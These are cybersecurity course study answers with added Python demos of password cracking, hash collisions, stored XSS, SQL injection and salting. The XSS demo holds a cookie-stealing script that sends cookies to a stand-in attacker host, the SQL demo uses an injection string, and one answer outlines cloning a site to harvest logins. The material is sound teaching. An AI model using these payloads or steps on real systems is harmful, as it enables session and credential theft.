Cybersecurity
Describe three different cracking methods, such as 'brute force', 'dictionary attacks', and 'rainbow tables'.
Brute Force: The simplest method and the least efficient. The attacker tries every possible string over a character set, one length at a time, hashing each guess and comparing it with the stored hash until one matches. It always succeeds eventually, but the number of guesses grows exponentially with the password length, which is why long passwords resist it. Dictionary Attack: Instead of every string, the attacker hashes candidates from a "dictionary" of the most common passwords and words (often with mangling rules such as appended digits or a capitalized first letter) and compares each with the stored hash. Because people choose predictable passwords, this recovers a large share of real passwords with a tiny fraction of the work of brute force. The same lists are what password strength meters consult to warn that a chosen password is weak, moderate or strong. Rainbow Table: A precomputed table that maps hash values back to the passwords that produce them for one specific algorithm (an MD5 table, a SHA-1 table, and so on), stored compactly as hash chains so that cracking a hash becomes a lookup instead of a computation. Passwords are hashed, not encrypted, so there is no key to recover. The attacker needs a table for the algorithm actually used, which can usually be inferred from the length and format of the stored hash, but the real limit on this attack is salting: a random per-user salt changes every hash, so a precomputed table no longer applies and each hash has to be attacked separately.
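The three methods above, as an added example that is not part of the original page: all three run against a small constructed set of unsalted SHA-256 hashes. The hash list, the wordlist and the character set are made up for the demonstration, and a plain hash-to-password dictionary stands in for a rainbow table, since the trade-off it shows (precompute once, then crack by lookup) is the same.

```python
# Added example: brute force, dictionary attack and precomputed-table lookup
# against constructed, unsalted SHA-256 password hashes.
import hashlib
import itertools
import string


def sha256_hex(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed "stolen" hashes, as an attacker might find them in a breached table.
STOLEN_HASHES = [
    sha256_hex("ab1"),      # short and random: only brute force finds it
    sha256_hex("letmein"),  # common word: the dictionary finds it
    sha256_hex("qwerty"),   # common word: also in the precomputed table
]

# Constructed wordlist of "most common passwords".
WORDLIST = ["password", "123456", "qwerty", "letmein", "dragon"]


def brute_force(target: str, alphabet: str, max_len: int):
    """Try every string over `alphabet` up to max_len characters.
    The work is sum(len(alphabet) ** k), exponential in the password length."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            guess = "".join(chars)
            if sha256_hex(guess) == target:
                return guess
    return None


def dictionary_attack(target: str, wordlist):
    """Hash each likely password and compare; far fewer guesses than brute force."""
    for word in wordlist:
        if sha256_hex(word) == target:
            return word
    return None


def build_lookup_table(wordlist):
    """Precompute hash -> plaintext once. A rainbow table is a compressed form of
    this idea (hash chains joined by reduction functions), but the trade-off is
    the same: spend time up front, then crack each hash with a lookup. The table
    is only valid for this one algorithm and only for unsalted hashes."""
    return {sha256_hex(w): w for w in wordlist}


def table_lookup(target: str, table):
    return table.get(target)


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    alphabet = string.ascii_lowercase + string.digits
    for h in STOLEN_HASHES:
        print(h[:12], "brute:", brute_force(h, alphabet, 3),
              "dict:", dictionary_attack(h, WORDLIST),
              "table:", table_lookup(h, table))
```

Running it shows the trade-off: brute force over 36 characters and 3 positions takes about 48,000 hashes and only recovers the short password, while the dictionary and the table recover the common ones with five hashes and one lookup respectively.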
Provide a description of buffer overflows and identify how they occur, and how they can be exploited by an attacker.
A buffer overflow occurs when a program reserves a fixed amount of memory (a buffer) for an input and then copies in more data than the buffer can hold without checking the length. The excess is written past the end of the buffer into whatever memory lies next to it: other variables, heap bookkeeping data or, for a buffer on the stack, the saved return address of the current function. The root cause is the missing bounds check, typically an unbounded copy such as strcpy or gets in C. An attacker exploits it by crafting input that is just long enough to overwrite the adjacent data with chosen values. Overwriting a saved return address lets the attacker redirect execution, for example to executable code (shellcode) supplied inside the same input, so the process runs the attacker's code with the process's own privileges. Even without hijacking control, the attacker can corrupt neighboring variables (a length field, a privilege flag, a pointer) or simply crash the program, giving a denial of service.
What makes WEP a poor protocol choice?
1. The key is short: WEP uses RC4 with a 40-bit (later 104-bit) key, and when the key is derived from a passphrase it is susceptible to dictionary attacks. 2. It uses a single static key shared by the access point and every client. Because changing it means reconfiguring every device, the same key tends to be used for a long time. 3. The per-packet 24-bit initialization vector (IV) is too short, so IVs repeat on a busy network and RC4 keystreams are reused; combined with weak keys in RC4's key schedule, this lets an attacker recover the full key from captured traffic in minutes, far more cheaply than brute force. 4. The integrity check is a CRC-32, which is linear and not keyed, so an attacker can modify the data and fix up the checksum without the end user knowing. 5. There is no real authentication. Open-system mode needs only the SSID, MAC address filtering is defeated by spoofing a permitted address, and shared-key authentication actually leaks keystream that helps the attacker.
Describe the difference between functional testing and security testing.
Functional testing is typically done before release and verifies that, given normal expected inputs, the program operates as specified, and that with unexpected or malformed inputs it either handles the input correctly or fails gracefully. It checks that the program does what it should. Security testing checks that the program does nothing it should not: the tester actively attacks the program, trying to find and exploit vulnerabilities, misuse features and bypass controls. Ideally it runs throughout development alongside functional testing; in practice it often happens late in the development cycle or, less ideally, after release, when fixes are far more expensive.
Suggest a source of some very long unpredictable numbers. Your source must be something that both the sender and receiver can readily access but that is not obvious to outsiders and not transmitted directly from sender to receiver.
One option is a seed built from values both parties already share but an outsider would not guess, such as an agreed geographic location and an agreed timestamp, expanded by concatenating several of the number strings it yields into one very long value. Nothing has to be transmitted: sender and receiver compute the same number independently, and an outsider who does not know which inputs were agreed cannot reproduce it. The caveat is that the value is only as unpredictable as the agreed inputs; a coordinate and a round timestamp have limited entropy, so the inputs must stay secret and be drawn from a large space.
What is meant by a 'one way hash function'? Describe how they are used.
A one-way hash function takes an input of any length and produces a fixed-length output (the digest) such that computing the digest from the input is easy but recovering any input from a given digest is computationally infeasible. It is not encryption: there is no key and nothing is meant to be reversed. A good hash function is also resistant to second preimages (finding a different input with the same digest as a given one) and to collisions (finding any two inputs with the same digest), and a one-bit change to the input changes the digest unpredictably. Hash functions are used to check the integrity of data and packets (compare the digest of what was received with the digest that was sent, or sign the digest rather than the whole message), to store passwords so that a stolen database does not reveal them, and as the core of message authentication codes and digital signatures. The textbook illustrates the one-way idea with an equation like y = x^3: easy to compute y from x, harder to go back. Real hash functions rest on far harder inversion problems, since a cube root is easy to compute.
Describe the SSL protocol
SSL (Secure Sockets Layer) is a cryptographic protocol for securing a connection between two machines over the Internet, encrypting data that would otherwise travel as plain text and authenticating the server to the client with a certificate. SSL has been superseded by TLS (Transport Layer Security), its direct successor; every version of SSL is deprecated and should be disabled, though the name is still used loosely for both. It is most commonly met through a web browser: HTTPS at the start of a URL means HTTP carried over SSL/TLS, and the S stands for secure. The padlock tells you the channel is encrypted and the certificate matched the host name; it says nothing about whether the site itself is honest.
What is a database management system? What functions does it perform? Provide examples of two different DBMS solutions (vendor and typical uses).
A database management system (DBMS) is software that stores data in a structured form and lets users and applications query and modify it through a defined interface (usually SQL) rather than through raw files. Beyond storage and retrieval it enforces access control (who may read or change which tables), checks integrity constraints, manages concurrent access with transactions, provides backup and recovery, and logs or monitors activity for auditing. Two common DBMS are IBM's DB2 and the open-source MySQL. DB2 is typically used in large corporate and mainframe environments, while MySQL is often used as the backend of web applications.
Which component of the CIA Triad is the DoS attack intended to defeat?
A DoS (Denial of Service) attack prevents legitimate users from reaching a service. It is a direct attack on Availability in the CIA triad: content and services that should be ready for authorized users cannot be accessed. Typically the attacker floods the target with more requests or traffic than it can handle, or sends input that crashes it, rendering the service unusable. Confidentiality and integrity are usually untouched; the data is still intact and still private, just unreachable.
Describe what is meant by a 'Collision Condition' in the context of a hash function.
A collision occurs when a hash function produces the same digest for two different inputs. Because the digest has a fixed length while the input can be of any length, collisions must exist for every hash function (there are more possible inputs than outputs); the requirement is that finding one should be computationally infeasible. A "collision condition" is the weakness that arises when that no longer holds and an attacker can construct two inputs with the same digest in practice, as happened to MD5 and later SHA-1. A collision does not let the attacker decrypt anything or recover the algorithm (which is public anyway); what it allows is substituting one document for another without changing the digest, so a signature, certificate or checksum computed over the harmless version also vouches for the malicious one. Salting does not prevent collisions; it only makes identical password inputs hash differently. The remedy is to migrate to a hash function with a larger output and no known collision attack, such as SHA-256.
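An added example (not from the original page) for the two answers above on one-way hashing and collisions. It builds a toy hash by keeping only the top 16 bits of SHA-256: the fixed length, one-wayness and avalanche behaviour of the real function are preserved, but the output space shrinks to 65,536 values, so a birthday search finds a collision after a few hundred random inputs. The function names and the random inputs are constructed for the demonstration.

```python
# Added example: one-way hash properties and a birthday-bound collision search
# on a deliberately truncated SHA-256.
import hashlib
import os


def sha256_digest(data: bytes) -> bytes:
    """Fixed-length 32-byte digest for an input of any length."""
    return hashlib.sha256(data).digest()


def truncated_hash(data: bytes, bits: int = 16) -> int:
    """Keep only the top `bits` bits of SHA-256(data): a toy, weak hash."""
    full = int.from_bytes(sha256_digest(data), "big")
    return full >> (256 - bits)


def bits_changed(a: bytes, b: bytes) -> int:
    """How many of the 256 digest bits differ between SHA-256(a) and SHA-256(b).
    For distinct inputs this is close to 128, however similar a and b are:
    the avalanche effect."""
    x = int.from_bytes(sha256_digest(a), "big")
    y = int.from_bytes(sha256_digest(b), "big")
    return bin(x ^ y).count("1")


def find_collision(bits: int = 16, max_trials: int = 1_000_000):
    """Birthday search: hash random inputs, remember each digest, and stop at
    the first digest already seen for a different input. Expected trials are
    about sqrt(pi/2 * 2**bits), roughly 320 for 16 bits; against the full
    256-bit digest the same search would need about 2**128 trials."""
    seen = {}
    for _ in range(max_trials):
        m = os.urandom(8)  # constructed random input
        h = truncated_hash(m, bits)
        if h in seen and seen[h] != m:
            return seen[h], m, h
        seen[h] = m
    return None


def is_collision(m1: bytes, m2: bytes, bits: int = 16) -> bool:
    return m1 != m2 and truncated_hash(m1, bits) == truncated_hash(m2, bits)


if __name__ == "__main__":
    m1, m2, h = find_collision()
    print(f"{m1.hex()} and {m2.hex()} both truncate to {h:#06x}")
    print("their full SHA-256 digests differ in", bits_changed(m1, m2), "of 256 bits")
```

The last line of output is the point: the two inputs collide only on the truncated digest, while their full digests differ in about half their bits, which is why digest length and not just the algorithm matters when choosing a hash.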
Distinguish between vulnerability, threat, and control.
A vulnerability is a weakness in a system that could be exploited to cause unwanted effects; weak passwords or missing identification procedures such as security questions are examples. A threat is a set of circumstances that has the potential to cause harm by exploiting a vulnerability. Threats can come from people (an attacker), from software acting on their behalf (malware) or from nature, such as a disaster that wrecks a system. A control is an action, technique, procedure or device (for example a fingerprint scanner) that removes or reduces a vulnerability, so that a threat is less likely to succeed or does less damage when it does.
List three authentication questions (but not the answers) a credit card company could ask to authenticate a customer over the phone. The questions should be ones to which an impostor could not readily obtain the answers. How difficult would it be for you to provide the correct answer (for example, you would have to look something up or you would have to do a quick arithmetical calculation)?
A. The last two valid transactions on your credit card. The card owner can read these from online banking or remember them, while an impostor who has only the card number cannot. B. The ZIP code of the billing address. The owner knows it, but this one is weaker than it looks: billing addresses appear on mail and in breached databases, so an impostor who has researched the victim can often answer it. C. The credit limit of the card. This appears only on statements and in the account, so only the user will readily know it, though an attacker who has obtained a statement would too. None of the three needs a calculation; the owner might have to glance at a recent statement or log in, but would not have to look anything up from an outside source.
Discuss a situation in which the sensitivity of an aggregate is greater than that of its constituent values. What about a situation in which the sensitivity of an aggregate is less than that of its constituent values?
Aggregate more sensitive than its constituent values: purchase history. A single credit card transaction reveals little, but a billing statement, or a collection of statements, lets an observer infer where a person lives, works and travels, what they buy and when, and therefore their habits and routines. Constituents more sensitive than the aggregate: a survey. Individual responses are anonymized and kept even from the surveyor so that respondents answer honestly; the aggregated results (averages, percentages) are published for anyone to read, while the individual answers are never revealed, to protect those who responded.
File access control relates largely to the secrecy dimension of security. What is the relationship between an access control matrix and the integrity of the objects to which access is being controlled?
An access control matrix is a model in which every subject (user or process) has a set of rights (read, write, execute, own) to every object in the system; each cell holds the rights one subject has over one object. Enforcing the matrix ensures data is read only by subjects authorized to read it, which is the secrecy dimension. Integrity comes from the same matrix: write, modify and delete are also rights recorded in the cells, so an object can only be changed by a subject the administrator granted that right. By restricting who may write, the matrix guarantees that an object's contents were altered only by authorized subjects, which is exactly what the integrity of the object requires.
Explain how a forger can create an authentic-looking website for a commercial establishment.
An attacker can forge a website by visiting the legitimate site and using the browser's inspect or view-source feature to copy its HTML, CSS and images. The server-side code (PHP and so on) is not visible and not needed: the attacker only has to reproduce what users see, and the forms simply post to the attacker's own server instead. 1. Register a domain name that looks authentic, for example a misspelling of the real one or the real name under a different top-level domain, and obtain a certificate for it so the page shows HTTPS. 2. Copy the source code (HTML) of the page being mimicked. 3. Copy the CSS and images so the page renders identically, and point the login form at the attacker's server to collect credentials.
What makes a network vulnerable to interception?
Anonymity: An attacker can tap a link or sniff a network from anywhere in the world without revealing who they are, and can make as many attempts as they like. Many points of attack: Data crossing a network passes through many links, switches and routers, any of which can be monitored, and on shared media such as wireless every station can see every frame; a larger network has more such points, in the same way that a more complex car has more things that can go wrong. Complexity: Complex networks are harder to protect, and a defender cannot watch every path. Unknown perimeter and path: Networks change constantly and the sender does not control the route a packet takes, so data may cross networks and hosts the owner does not even know about, making it hard to tell what belongs and what does not.
What is Phishing?
Phishing is a social engineering attack that tricks a user into treating a fake web page, email or other interface that accepts sensitive information (username, password, credit card numbers, etc.) as the real one. Usually it starts with a message that imitates a trusted organization and urges the user to click a link and "verify" or "update" an account. If the user is not wary, the attacker obtains the credentials and can take over the account, drain a bank account or steal the person's identity. To defend against it, check the full URL of any page that asks for credentials to ensure it really is the legitimate site and not a lookalike, avoid following links in unsolicited messages and instead type the address or use a bookmark, and enable multi-factor authentication so that a stolen password alone is not enough.
Define and describe confidentiality, integrity, and availability of data.
Confidentiality is the ability of a system to ensure that an asset is viewed only by authorized parties. If something is confidential, only authorized people or systems can gain access to the protected data. The term is most often used for data. Examples of breaches of confidentiality: an unauthorized person accesses a data item; a person authorized for certain data accesses other data they are not authorized for; an unauthorized person learns even that a piece of data exists. One phrase that captures confidentiality is look but do not touch: it concerns viewing (and learning of) data, not altering it. Integrity is the ability of a system to ensure that an asset is changed only by authorized parties. Integrity is harder to pin down than confidentiality because it means different things in different situations; in general, something with integrity is precise, accurate, modified only in acceptable ways by authorized people through an authorized process, and is consistent, meaningful and usable. Availability is the ability of a system to ensure that an asset can be used by any authorized party. It applies both to data and to services and can be complex: an object is available if it is present in a usable form, has enough capacity to meet the service's needs, is making clear progress and has a bounded waiting time.
Discuss each of the principles of the CIA triad as they relate to database systems.
Confidentiality: The data in a database varies widely in sensitivity, so the DBMS must ensure that each user sees only the rows and columns they are authorized to see, through access controls, views and query restrictions, and must guard against inference, where an unprivileged user deduces sensitive values from aggregate queries. Integrity: Stored data must actually be what it is described to be. The DBMS must enforce that values are accurate and consistent (type and range checks, referential integrity), that changes are made only by authorized users, and that a failure midway through an update does not leave the database half-changed, which is what transactions and two-phase commit provide. Availability: The data must be accessible to authorized users and applications when they need it, including under concurrent access, so the DBMS provides locking, backups and recovery; at the same time only the appropriate people may access and edit the system and the data it contains.
Describe Cross-Site Scripting (XSS). What is it and how is it carried out?
Cross-Site Scripting (XSS) is an attack in which malicious script supplied by an attacker ends up in a web page served to other users and is executed by their browsers with the privileges of that site. It happens when a web application includes untrusted input in its output without encoding it, so the browser cannot tell attacker-supplied markup from the site's own. In reflected XSS the payload travels in a URL or form field and is echoed back in the response, so the victim has to be lured into clicking a crafted link; in stored XSS the payload is saved by the server (a comment, a profile field) and served to everyone who views it. The script runs in the victim's session and can read cookies and session tokens, perform actions as the victim, or rewrite the page to capture credentials. The defense is to encode output for the context it is inserted into (HTML body, attribute, JavaScript, URL) and to restrict which scripts may run with a Content Security Policy.
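The stored variant described above, as an added example that is not part of the original page. It models a comment page rendered by a server-side template two ways: spliced together from raw user text (the XSS bug) and with the text HTML-encoded. The page template, the function names and the attacker's comment are constructed for the demonstration.

```python
# Added example: stored XSS in a server-rendered comment page, vulnerable
# rendering beside the encoded version.
import html

# Constructed attacker input: a stored-XSS payload that would send the session
# cookie of every visitor who views the comment page to the attacker's host.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

PAGE = "<html><body><h1>Comments</h1><ul>{items}</ul></body></html>"


def render_unsafe(comments):
    """Splices user text straight into HTML. Any markup in a comment becomes
    part of the page, so a <script> tag runs in every viewer's browser."""
    items = "".join(f"<li>{c}</li>" for c in comments)
    return PAGE.format(items=items)


def render_safe(comments):
    """Encodes each comment for the HTML-body context before insertion.
    html.escape turns < > & " ' into entities, so the browser shows the payload
    as text instead of executing it. Attribute, JavaScript and URL contexts
    need their own encoders; input validation alone is not a substitute."""
    items = "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return PAGE.format(items=items)


def contains_live_script(page: str) -> bool:
    """Crude check used here to show the difference: is a real <script> tag
    present in the rendered page?"""
    return "<script>" in page


if __name__ == "__main__":
    comments = ["nice post", PAYLOAD]
    print("unsafe page executes payload:", contains_live_script(render_unsafe(comments)))
    print("safe page executes payload:  ", contains_live_script(render_safe(comments)))
```

In the safe rendering the comment still appears on the page, character for character, but as text: the browser never sees a tag, which is the whole of the fix for this context.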
List at least three kinds of damage a company could suffer when the integrity of a program or company data is compromised.
Data loss and liability: A hacker alters and leaks the social security numbers and private information of guests at a five-star hotel. Hotel and guests are insured, but a guest sues for the psychological damage of identity theft. Reputation: An antivirus company is compromised by malware that evades its own detection; when the company ships an update, the malware is installed on every user's computer and records keystrokes. Customers no longer trust the company even though a patch follows quickly and no further damage is done. Internal damage: A sales company hires a new IT intern who changes the website's code in a way that takes it down for 24 hours. No one in the company can work and a full day of revenue is lost; the intern is soon fired. Financial: Whenever a program's integrity or a company's data is compromised there is potential for financial loss; the online marketplace or website may have to be shut down, losing business, and the cost of investigating and repairing the damage comes on top.
How is data transmitted over a network?
Data is transmitted in packets, each carrying a header with the destination address, the source address and control information, followed by one unit of the data being sent. Together the packets make up the whole message. A device sends each packet to its router, which looks up the destination in its routing table to choose the next hop; each router along the way repeats this until the packet reaches the destination network. Packets from the same message do not necessarily take the same route and may arrive out of order, duplicated or not at all, which is why a transport protocol such as TCP numbers them and the receiving host reassembles them in order, requesting retransmission of any that are missing.
Does password length play a role in increasing the strength of the password?
In general, yes. Each extra character multiplies the number of possible passwords by the size of the character set, so the guesses an attacker needs grow exponentially with length, while adding a symbol class only multiplies the set size once. Length alone is not enough, though: a long password that is a dictionary word or a predictable phrase falls to a dictionary attack regardless of length. Strength comes from length combined with unpredictability; a random mix of uppercase and lowercase letters, digits and special characters, or a long passphrase of unrelated words, makes a strong password.
List at least three kinds of harm a company could encounter from loss of service, that is, failure of availability. List the product or capability to which access is lost, and explain how this loss hurts the company.
Loss of potential customers: If the website is unavailable for an extended period, customers looking for the service will click the link, see a dead page and move on to a competitor. Current customers who cannot reach the service for a long time may also switch to one that is available. This hurts the company because it drives customers away and loses revenue. Productivity loss: If the company's servers are down and employees cannot reach the files and data they need, nothing gets done until the problem is resolved, while salaries are still being paid. Discovery: During an outage, new customers trying to reach the company online may conclude that it no longer exists or has closed. If the outage affects the servers that deliver the company's advertising, the company loses potential customers who had an interest in its product. Dependability: If loss of service is frequent, customers' faith in the company dwindles over time; unable to rely on the service, they take their business elsewhere, costing the company a customer and the associated sales.
If you forget your password for a website and you click [Forgot my password], sometimes the company sends you a new password by email but sometimes it sends you your old password by email. Compare these two cases in terms of vulnerability of the website owner.
Neither solution is great: both send an active password over email, which is usually unencrypted in transit and then sits in the user's mailbox. Sending the old password is definitely worse, because it means the site stores passwords in plain text (or reversibly), so a breach of the site exposes every user's password, and because the user is likely to keep using a password that has now been transmitted insecurely, especially if setting a new one is not required. Sending a new password is the better of the two, provided it is temporary, single-use and must be replaced at first login; best practice is to send a time-limited reset link rather than a password at all. Both still rest on the security of the user's email account, which, given how often people sign into it, tends to have a weak password, so whoever controls the mailbox controls the website account.
Select and describe two browser attack types
Page-in-the-Middle: The attacker redirects the user to a page that looks like the one they wanted, sits between the user and the real site, and waits until the user reaches a sensitive part of it, such as the login form, to capture the credentials before passing them on.
Keystroke Logger: A keylogger can be software or hardware. It either stores the keystrokes it records or sends them to the attacker across the network. A hardware version plugs in between the keyboard and a USB port and is retrieved later by the attacker.
Cross-Site Scripting (XSS): A fairly common vulnerability caused by not encoding user-supplied input before putting it into a page. JavaScript typed into a form field, or placed in a URL parameter that the page echoes back, is then executed by other users' browsers.
SQL Injection: Also caused by forms that do not separate data from code. The attacker enters SQL syntax in a form field so that the query the server builds by string concatenation executes the attacker's clause as well, for example bypassing a login check or dumping the usernames table. The fix is parameterized queries.
Download Substitution: When a user goes to download a piece of software, the download button or link instead delivers a malicious program, or the legitimate program bundled with one. Many download sites carry fake download buttons as advertisements, and legitimate free software is often bundled with unwanted extra software to fund the software or the hosting site.
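The SQL injection entry above, as an added example that is not part of the original page: a login check written by string concatenation next to the parameterized version, run against an in-memory SQLite table. The table, its two users and the injected username are constructed for the demonstration, and the passwords are stored in plain text only to keep the example short (a real table holds salted hashes).

```python
# Added example: SQL injection through string-built queries, and the
# parameterized query that prevents it.
import sqlite3


def setup():
    """Constructed users table (plain-text passwords for brevity only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def login_unsafe(conn, username, password):
    """The user's text becomes part of the SQL statement itself, so a quote
    in the input closes the string and the rest is parsed as SQL."""
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver binds the values separately from the
    statement, so they are only ever treated as data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = setup()
    # Constructed injection: the quote ends the username literal and "--"
    # comments out the password check, so any password is accepted.
    injected = "alice' --"
    print("unsafe:", login_unsafe(conn, injected, "wrong"))  # alice
    print("safe:  ", login_safe(conn, injected, "wrong"))    # None
```

With the injected username the string-built query becomes SELECT username FROM users WHERE username = 'alice' --' AND password = 'wrong', and everything after the comment marker is ignored; the parameterized version looks for a user literally named alice' -- and finds none.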
Discuss the basic security requirements of database systems.
Physical database integrity: the hardware the database runs on is protected from physical threats and the data survives power failures and other hardware faults.
Logical database integrity: the structure of the database is preserved; a change to one field affects only the entities it is supposed to.
Element integrity: each element contains accurate, valid data.
Auditability: access and changes can be tracked and monitored.
Access control: users can access only the parts of the database they are authorized to access.
User authentication: users are who they claim to be, verified to support access control and auditability.
Availability: the database is up, running and accessible to authorized users when they need it.
How is port scanning used by attackers?
Port scanning is a way of gathering intelligence on potential targets. Because time is valuable and clumsy attacks risk detection, attackers want details about a system first so they can focus their efforts. Scanning is easy: many free scanning tools are available, and they probe each port on a host to see whether it accepts connections. A scan reveals three important kinds of information: which ports are open and what services listen on them, the installed operating system (inferred from how the network stack responds), and the installed applications and their versions (read from service banners). With that, the attacker can choose an exploit that fits a specific version instead of guessing, which raises the chance of success and lowers the chance of noisy failures that trigger detection.
What is public key cryptography? Explain how it works.
Public key cryptography is encryption that uses a pair of mathematically related keys rather than one shared secret. The public key can be shared freely: anyone can use it to encrypt data for its owner, or to verify a signature the owner made. The private key is known only to its owner and is the only key that can decrypt that data or produce that signature; it is the private key, not the public one, that is sometimes kept on a hardware token such as a USB device so that it never leaves the token. Although the two keys are mathematically related, the private key cannot feasibly be calculated from the public key. This is what makes the scheme useful: two parties who have never met can communicate securely because only the decrypting side needs a secret, and that secret never has to be transmitted.
Select a network hardware component and describe its function (such as router, switch, etc.)
Router: Routers connect networks and relay packets between them. At each junction the router consults its routing table to choose the next hop that moves the packet toward its destination. Routers direct traffic across the Internet and, in a home, let the devices on the local network share one connection to it.
Cable Modem: A cable modem lets your computer communicate with your ISP (Internet Service Provider) over the cable line. It modulates digital data onto the analog cable signal and demodulates the reply, providing broadband Internet access. A computer can be connected directly to the modem with an Ethernet cable for a wired connection, or a wireless router can be connected to the modem to share the connection wirelessly. It is one of the core components needed for a usable home network.
Network Switch: Switches used to sit between routers and hubs in function; now that hubs have effectively disappeared, switches have taken over their role and do it more efficiently, since a switch sends each frame only to the port where the destination is. Switches build local networks: they can be managed or unmanaged, and they forward frames within the network using a MAC address table that maps each address to a port. In a home, a small switch (typically 4 ports) is bundled into one box with the router, the wireless access point and sometimes the modem.
What is meant by 'salting' in the context of hash functions?
Salting is the practice of adding a random value, the salt, to a password before it is hashed, and storing the salt alongside the resulting hash. The salt is generated by the server per user and is not secret; its job is to make every stored hash unique. Because the salt is part of the hash input, the output differs completely from the hash of the password alone, and two users with the same password get different hashes. That defeats precomputed attacks: a rainbow table or hash lookup built for unsalted hashes no longer matches, and an attacker must recompute every candidate from a wordlist separately for each user's salt. (A secret value added to every password and kept outside the database is a pepper, a separate technique.) Salting should be combined with a slow, deliberately expensive hash such as bcrypt, scrypt, Argon2 or PBKDF2 so that each recomputation costs the attacker as much as possible.
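Per-user salting as an added example that is not part of the original page, using PBKDF2-HMAC-SHA256 from the standard library. The function names are constructed, and the iteration count is deliberately low so the example runs in well under a second; a production deployment uses a much higher count.

```python
# Added example: salted password hashing with PBKDF2, verification, and what
# salting forces on an attacker who has the stored values.
import hashlib
import hmac
import os

# Constructed parameter: kept small so the example runs quickly. Production
# deployments use a far higher count (hundreds of thousands or more).
ITERATIONS = 50_000


def hash_password(password: str, salt: bytes = None):
    """Return (salt, digest). A fresh 16-byte salt is drawn per user when none
    is given; it is stored in the clear next to the digest and is not secret."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


def same_password_distinct_hashes(password: str) -> bool:
    """Two users with the same password get different salts, hence different
    digests, so a leaked table does not even reveal who shares a password."""
    s1, d1 = hash_password(password)
    s2, d2 = hash_password(password)
    return s1 != s2 and d1 != d2


def crack_salted(salt: bytes, digest: bytes, wordlist):
    """What the attacker is forced to do: no precomputed table applies, so each
    candidate is recomputed with this one user's salt, at full PBKDF2 cost per
    guess, and the work has to be repeated for every other user."""
    for word in wordlist:
        if verify_password(word, salt, digest):
            return word
    return None


if __name__ == "__main__":
    salt, digest = hash_password("hunter2")
    print("salt:", salt.hex(), "digest:", digest.hex()[:16], "...")
    print("verify correct:", verify_password("hunter2", salt, digest))
    print("same password, distinct hashes:", same_password_distinct_hashes("hunter2"))
    print("cracked with wordlist:", crack_salted(salt, digest, ["password", "hunter2"]))
```

Note that crack_salted still succeeds when the password is in the wordlist: salting does not rescue a weak password, it only removes the precomputation shortcut and multiplies the attacker's work by the number of users.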
Defeating authentication follows the method-opportunity-motive paradigm described in Chapter 1. Discuss how these three factors apply to an attack on authentication.
Someone wanting to defeat authentication needs a method for breaking in, an opportunity in the form of a weakness in the system, and a motive for wanting to get in. Methods depend on the type of authentication in use: the more sophisticated the mechanism, the more skill is needed to break it, from guessing a password to forging a token or exploiting a flaw in the protocol. Opportunities are weaknesses the attacker can reach, such as an employee with a particularly weak password or one who leaves a computer unlocked while away from the desk; many seemingly small mistakes are more than enough opportunity for an attacker to get past authentication. Motives always vary, but most attackers target systems where there is a lot to gain, such as money or enough personal information to steal someone's identity.
Briefly describe each layer in the OSI model
The Open Systems Interconnection model divides network communication into 7 layers, each serving the one above it. Physical (Layer 1): transmits raw bits as electrical, optical or radio signals over the medium. Data Link (Layer 2): groups bits into frames, adds hardware (MAC) addressing and detects errors on a single link, as Ethernet does. Network (Layer 3): packages data into packets with logical addresses (IP) and routes them across networks, router to router. Transport (Layer 4): provides end-to-end delivery between processes; TCP adds sequencing, acknowledgement and retransmission so that delivery is complete and in order, UDP does not. Session (Layer 5): establishes, maintains and ends the dialogue between two systems. Presentation (Layer 6): translates data into a form the recipient can use, handling encoding, compression and, in this model, encryption. Application (Layer 7): the protocols the user's programs speak, such as HTTP, SMTP and DNS, through which the information is actually used.
Differentiate between symmetric and asymmetric encryption systems.
The difference is simple but powerful. A symmetric system uses a single secret key, shared by both parties, with an algorithm such as AES: the same key encrypts and decrypts, so the two parties must already share it, and the hard problem is distributing that key safely. (A hash function, by contrast, uses no key at all and is not encryption.) An asymmetric system uses two keys, one public and one private: anything encrypted with the public key can only be decrypted with the private key, and a signature made with the private key can be checked by anyone with the public key. Because one key can be published, two parties who have never met, such as a customer and a merchant in a financial transaction, can exchange it openly without compromising the private key or the system. Asymmetric algorithms are much slower, so in practice they are used to exchange a symmetric session key and to sign, while the bulk data is encrypted symmetrically.
Identify and describe 3 different types of malware
Viruses: malicious code that attaches itself to a host program or file and spreads when the infected file is run or copied, infecting or corrupting further files as it goes; it needs a user action to spread.
Worms: self-contained malware that propagates across a network on its own, exploiting vulnerabilities on connected computers without any user action.
Trojan Horses: malware disguised as, or hidden inside, a useful-looking program so that the user installs it willingly; it then does something hidden, such as opening a backdoor. (Code that lies dormant until a timer or a specific trigger fires is a logic bomb or time bomb, which a Trojan may carry.)
Ransomware: malware that, typically after arriving through a malicious link or attachment, encrypts the user's files and demands payment for the key to get them back.
Spyware: malware that runs in the background to gather information (browsing, keystrokes, credentials) without the user's knowledge and sends it to the attacker.
Script attack: malicious code (usually JavaScript) delivered as part of a page load, for example pop-ups sized so that they cannot be closed, or pages that spawn a new tab every time the user tries to close the existing one.
Using the two-step commit presented in the beginning of this chapter, describe how to avoid assigning one seat to two people, as in the airline example. That is, list precisely which steps the database manager should follow in assigning passengers to seats.
